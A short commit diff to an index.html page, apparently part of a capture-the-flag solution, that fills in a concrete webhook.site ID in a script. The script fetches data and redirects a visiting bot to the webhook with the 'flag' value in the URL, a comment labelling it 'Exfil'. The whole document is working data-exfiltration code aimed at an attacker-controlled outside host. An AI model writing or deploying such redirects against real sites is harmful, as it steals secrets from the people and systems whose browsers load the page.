Update script to redirect with specific webhook ID

--- a/index.html
+++ b/index.html
@@ -7,6 +7,7 @@
     .then(r => r.json())
     .then(data => {
       // Exfil: navigate the bot to your server with flag in URL
-      window.location = 'https://webhook.site/YOUR-ID?flag=' + encodeURIComponent(data.flag);
+      window.location = 'https://webhook.site/1c93ddcd-872e-4efe-a59d-566602e43a76?flag=' + encodeURIComponent(data.flag);
     });
 </script>
+
